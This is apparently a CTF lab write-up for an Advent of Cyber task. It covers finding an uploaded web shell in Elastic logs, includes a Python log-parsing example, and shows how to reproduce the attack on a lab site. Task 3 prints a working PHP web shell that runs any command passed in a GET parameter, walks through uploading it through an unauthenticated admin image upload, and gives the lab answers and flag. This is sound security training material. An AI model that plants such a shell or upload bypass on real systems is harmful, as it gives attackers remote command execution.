
Day 3: Even if I wanted to go, their vulnerabilities wouldn't allow it.

Task 1 - Where was the web shell uploaded to?

  • Open the provided URL. You will land on the Elastic homepage. From the top left, click the three-line menu and then click Discover.

  • Update the timeframe to Oct 3, 2024 @ 00:00:00.000 → Oct 4, 2024 @ 00:00:00.000.
    Now you can see there are a lot of hits (more than 400).

  • From the left menu, add the request field as a column by clicking the + button.

    [Screenshot: adding the request field as a column in Elastic]

  • There is a search bar at the top. Search for the keyword shell* and you will get all the requests that contain the word shell. In the results, the full path of shell.php is clearly visible.

    [Screenshot: result of the shell* search in Elastic]

Answer 👉 /media/images/rooms/shell.php

Task 2 - What IP address accessed the web shell?

  • To find the IP address that was used to access the web shell, add another field, clientip, as a column.

    [Screenshot: adding the clientip field as a column in Elastic]

  • Now you can see which IP address was used to make all of these web shell requests.

    [Screenshot: the clientip column listed in Elastic]

Answer 👉 10.11.83.34
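The same two questions can be answered without Kibana by parsing the raw access log. The following is an added example, not part of the original writeup or the lab: it runs over constructed web-server records in combined log format that mirror the lab (the IPs, path and commands are made up to match the answers above), finds every request whose path matches shell (the equivalent of the shell* search), lists the distinct paths, counts the client IPs, and also recovers the URL-decoded command= value each request carried, which is what an analyst would want next.

```python
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Constructed sample records in Apache/Nginx combined log format. These are
# illustrative lines modelled on the lab, not the lab's real Elastic data.
SAMPLE_LOG = """\
10.11.83.34 - - [03/Oct/2024:11:14:02 +0000] "GET /media/images/rooms/shell.php?command=whoami HTTP/1.1" 200 233 "-" "Mozilla/5.0"
10.10.2.41 - - [03/Oct/2024:11:14:05 +0000] "GET /rooms HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:14:09 +0000] "GET /media/images/rooms/shell.php?command=ls+-la HTTP/1.1" 200 1290 "-" "Mozilla/5.0"
192.168.1.5 - - [03/Oct/2024:11:15:00 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 40231 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:16:31 +0000] "GET /media/images/rooms/shell.php?command=cat+flag.txt HTTP/1.1" 200 180 "-" "Mozilla/5.0"
this line is not a valid log record
"""

# One combined-log record: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<clientip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>\S+) (?P<protocol>[^"]+)" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one record; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Split the request into path and query string so the path can be matched
    # on its own and the query can be decoded separately.
    path, _, query = rec["request"].partition("?")
    rec["path"] = path
    rec["query"] = query
    return rec


def find_web_shell_hits(log_text: str, keyword: str = "shell") -> List[Dict[str, str]]:
    """Equivalent of the Kibana search shell*: records whose path mentions the keyword."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None and keyword in rec["path"].lower():
            hits.append(rec)
    return hits


def shell_paths(hits: List[Dict[str, str]]) -> List[str]:
    """Task 1: the distinct paths at which the web shell was reached."""
    return sorted({h["path"] for h in hits})


def client_ips(hits: List[Dict[str, str]]) -> Counter:
    """Task 2: which client IPs issued the web shell requests, with counts."""
    return Counter(h["clientip"] for h in hits)


def commands_run(hits: List[Dict[str, str]]) -> List[str]:
    """The command= values passed to the shell, URL-decoded, in log order."""
    out = []
    for h in hits:
        out.extend(parse_qs(h["query"]).get("command", []))
    return out


if __name__ == "__main__":
    hits = find_web_shell_hits(SAMPLE_LOG)
    print("web shell path(s):", shell_paths(hits))
    print("client IPs:", client_ips(hits).most_common())
    print("commands run:", commands_run(hits))
```

Matching on the path rather than the whole line keeps a query string such as ?command=shell from producing a false hit, and the invalid trailing record shows why the parser must tolerate lines that do not fit the format instead of crashing on them.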

Task 3 - What is the contents of the flag.txt?


Now we have to do some hands-on work.

  • First add the IP to your hosts file. If you are using Linux, use the command
    echo "10.10.2.41 frostypines.thm" | sudo tee -a /etc/hosts
    (with sudo echo ... >> /etc/hosts the redirection runs as your own user and fails with permission denied, so tee is used to do the append as root).

  • Visit http://frostypines.thm in your browser. You will see a room booking site similar to:

    [Screenshot: frostypines.thm homepage]

  • There is an /admin directory with higher privileges that doesn't require any authentication. Visit the /admin directory and click on Add New Room.

    [Screenshot: frostypines.thm admin homepage]

  • There is an option to upload an image of the room. Instead of uploading a real image, upload the shell.php web shell file, and remember the room number.

    [Screenshot: frostypines.thm admin Add Rooms page]

    Code of shell.php (PHP):

    <html>
    <body>
    <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input type="text" name="command" autofocus id="command" size="50">
    <input type="submit" value="Execute">
    </form>
    <pre>
    <?php
        if(isset($_GET['command'])) 
        {
            system($_GET['command'] . ' 2>&1'); 
        }
    ?>
    </pre>
    </body>
    </html>
  • Now go back to the website and click on Rooms in the top bar. Find the room that you created. In my case it was the last room.

    [Screenshot: newly created room on frostypines.thm]

  • Right-click on the image and open it in a new tab. The URL will be http://frostypines.thm/media/images/rooms/shell.php

    [Screenshot: web shell on frostypines.thm]

    Run the command cat flag.txt and get the flag.

    [Screenshot: flag on frostypines.thm]

Answer 👉 THM{Gl1tch_Was_H3r3}

Task 4 - If you liked today's task, you can learn how to harness the power of advanced ELK queries.


No Answer Needed